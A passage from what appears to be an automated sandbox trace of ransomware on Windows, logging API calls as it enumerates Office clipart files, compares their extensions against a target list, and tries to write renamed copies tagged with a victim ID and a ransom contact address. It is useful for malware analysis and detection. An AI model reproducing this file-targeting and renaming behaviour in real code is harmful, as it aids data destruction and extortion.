dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.580] CloseHandle (hObject=0x438) returned 1 [0173.581] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.581] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01041_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.582] CloseHandle (hObject=0x438) returned 1 [0173.586] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.919] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01394_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.086] CloseHandle (hObject=0x438) returned 1 [0174.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.086] lstrlenW (lpString=".doc") returned 4 [0174.086] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.086] lstrlenW (lpString=".docx") returned 5 [0174.086] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.086] lstrlenW (lpString=".pdf") returned 4 [0174.086] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.086] lstrlenW (lpString=".xls") returned 4 [0174.086] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.086] lstrlenW (lpString=".xlsx") returned 5 [0174.087] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.087] lstrlenW (lpString=".ppt") returned 4 [0174.087] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.087] lstrlenW (lpString=".zip") returned 4 [0174.087] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.087] lstrlenW (lpString=".rar") returned 4 [0174.087] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.087] lstrlenW (lpString=".bz2") returned 4 [0174.087] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.087] lstrlenW (lpString=".7z") returned 3 [0174.087] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.087] lstrlenW (lpString=".dbf") returned 4 [0174.087] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.087] lstrlenW (lpString=".1cd") returned 4 [0174.087] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.087] lstrlenW (lpString=".jpg") returned 4 [0174.087] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.087] lstrlenW (lpString=".doc") returned 4 [0174.088] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.088] lstrlenW (lpString=".docx") returned 5 [0174.088] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.088] lstrlenW (lpString=".pdf") returned 4 [0174.088] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.088] lstrlenW (lpString=".xls") returned 4 [0174.088] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.088] lstrlenW (lpString=".xlsx") returned 5 [0174.088] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.088] lstrlenW (lpString=".ppt") returned 4 [0174.088] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.089] lstrlenW (lpString=".zip") returned 4 [0174.089] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.089] lstrlenW (lpString=".rar") returned 4 [0174.089] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.090] lstrlenW (lpString=".bz2") returned 4 [0174.090] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.090] lstrlenW (lpString=".7z") returned 3 [0174.090] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.090] lstrlenW (lpString=".dbf") returned 4 [0174.090] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.090] lstrlenW (lpString=".1cd") returned 4 [0174.090] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 68 [0174.090] lstrlenW (lpString=".jpg") returned 4 [0174.090] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.091] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.091] lstrlenW (lpString="SO00941_.WMF") returned 12 [0174.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0174.093] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=5896) returned 1 [0174.093] CloseHandle (hObject=0x438) returned 1 [0174.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf")) returned 0x220 [0174.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0174.101] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.101] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.102] CloseHandle (hObject=0x438) returned 1 [0174.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.102] lstrlenW (lpString=".doc") returned 4 [0174.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.102] lstrlenW (lpString=".docx") returned 5 [0174.102] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.102] lstrlenW (lpString=".pdf") returned 4 [0174.102] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.102] lstrlenW (lpString=".xls") returned 4 [0174.102] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.102] lstrlenW (lpString=".xlsx") returned 5 [0174.102] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.102] lstrlenW (lpString=".ppt") returned 4 [0174.102] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.102] lstrlenW (lpString=".zip") returned 4 [0174.102] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.102] lstrlenW (lpString=".rar") returned 4 [0174.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.103] lstrlenW (lpString=".bz2") returned 4 [0174.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.103] lstrlenW (lpString=".7z") returned 3 [0174.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.103] lstrlenW (lpString=".dbf") returned 4 [0174.103] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.103] lstrlenW (lpString=".1cd") returned 4 [0174.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.103] lstrlenW (lpString=".jpg") returned 4 [0174.103] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.103] lstrlenW (lpString=".doc") returned 4 [0174.103] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.103] lstrlenW (lpString=".docx") returned 5 [0174.103] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.103] lstrlenW (lpString=".pdf") returned 4 [0174.103] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.104] lstrlenW (lpString=".xls") returned 4 [0174.104] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.104] lstrlenW (lpString=".xlsx") returned 5 [0174.104] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.104] lstrlenW (lpString=".ppt") returned 4 [0174.104] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.104] lstrlenW (lpString=".zip") returned 4 [0174.104] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.104] lstrlenW (lpString=".rar") returned 4 [0174.104] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.104] lstrlenW (lpString=".bz2") returned 4 [0174.104] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.104] lstrlenW (lpString=".7z") returned 3 [0174.104] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.104] lstrlenW (lpString=".dbf") returned 4 [0174.104] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.104] lstrlenW (lpString=".1cd") returned 4 [0174.104] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 68 [0174.104] lstrlenW (lpString=".jpg") returned 4 [0174.104] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.105] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.105] lstrlenW (lpString="SO00942_.WMF") returned 12 [0174.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0174.106] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=4708) returned 1 [0174.106] CloseHandle (hObject=0x438) returned 1 [0174.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf")) returned 0x220 [0174.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0174.106] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.106] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.108] CloseHandle (hObject=0x438) returned 1 [0174.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.108] lstrlenW (lpString=".doc") returned 4 [0174.108] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.108] lstrlenW (lpString=".docx") returned 5 [0174.108] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.108] lstrlenW (lpString=".pdf") returned 4 [0174.108] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.108] lstrlenW (lpString=".xls") returned 4 [0174.109] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.109] lstrlenW (lpString=".xlsx") returned 5 [0174.109] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.109] lstrlenW (lpString=".ppt") returned 4 [0174.109] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.109] lstrlenW (lpString=".zip") returned 4 [0174.109] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.109] lstrlenW (lpString=".rar") returned 4 [0174.109] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.109] lstrlenW (lpString=".bz2") returned 4 [0174.109] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.109] lstrlenW (lpString=".7z") returned 3 [0174.109] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.109] lstrlenW (lpString=".dbf") returned 4 [0174.109] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.109] lstrlenW (lpString=".1cd") returned 4 [0174.109] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.109] lstrlenW (lpString=".jpg") returned 4 [0174.109] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.109] lstrlenW (lpString=".doc") returned 4 [0174.110] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.110] lstrlenW (lpString=".docx") returned 5 [0174.110] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.110] lstrlenW (lpString=".pdf") returned 4 [0174.110] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.110] lstrlenW (lpString=".xls") returned 4 [0174.110] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.110] lstrlenW (lpString=".xlsx") returned 5 [0174.110] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.110] lstrlenW (lpString=".ppt") returned 4 [0174.110] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.110] lstrlenW (lpString=".zip") returned 4 [0174.110] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.110] lstrlenW (lpString=".rar") returned 4 [0174.110] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.110] lstrlenW (lpString=".bz2") returned 4 [0174.110] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.110] lstrlenW (lpString=".7z") returned 3 [0174.110] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.110] lstrlenW (lpString=".dbf") returned 4 [0174.110] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.111] lstrlenW (lpString=".1cd") returned 4 [0174.111] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 68 [0174.111] lstrlenW (lpString=".jpg") returned 4 [0174.111] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.111] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.111] lstrlenW (lpString="SO00943_.WMF") returned 12 [0174.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0174.113] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=7556) returned 1 [0174.113] CloseHandle (hObject=0x438) returned 1 [0174.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf")) returned 0x220 [0174.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0174.115] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.115] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.115] CloseHandle (hObject=0x438) returned 1 [0174.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.116] lstrlenW (lpString=".doc") returned 4 [0174.116] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.116] lstrlenW (lpString=".docx") returned 5 [0174.116] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.116] lstrlenW (lpString=".pdf") returned 4 [0174.116] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.116] lstrlenW (lpString=".xls") returned 4 [0174.116] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.116] lstrlenW (lpString=".xlsx") returned 5 [0174.116] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.116] lstrlenW (lpString=".ppt") returned 4 [0174.116] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.116] lstrlenW (lpString=".zip") returned 4 [0174.116] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.116] lstrlenW (lpString=".rar") returned 4 [0174.116] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.117] lstrlenW (lpString=".bz2") returned 4 [0174.117] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.117] lstrlenW (lpString=".7z") returned 3 [0174.117] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.117] lstrlenW (lpString=".dbf") returned 4 [0174.117] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.117] lstrlenW (lpString=".1cd") returned 4 [0174.117] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.117] lstrlenW (lpString=".jpg") returned 4 [0174.117] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.117] lstrlenW (lpString=".doc") returned 4 [0174.117] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.118] lstrlenW (lpString=".docx") returned 5 [0174.118] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.118] lstrlenW (lpString=".pdf") returned 4 [0174.118] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.118] lstrlenW (lpString=".xls") returned 4 [0174.118] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.118] lstrlenW (lpString=".xlsx") returned 5 [0174.118] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.118] lstrlenW (lpString=".ppt") returned 4 [0174.118] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.118] lstrlenW (lpString=".zip") returned 4 [0174.118] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.119] lstrlenW (lpString=".rar") returned 4 [0174.119] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.119] lstrlenW (lpString=".bz2") returned 4 [0174.119] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.119] lstrlenW (lpString=".7z") returned 3 [0174.119] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.119] lstrlenW (lpString=".dbf") returned 4 [0174.119] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.119] lstrlenW (lpString="C:\\Program Files\\Microsoft 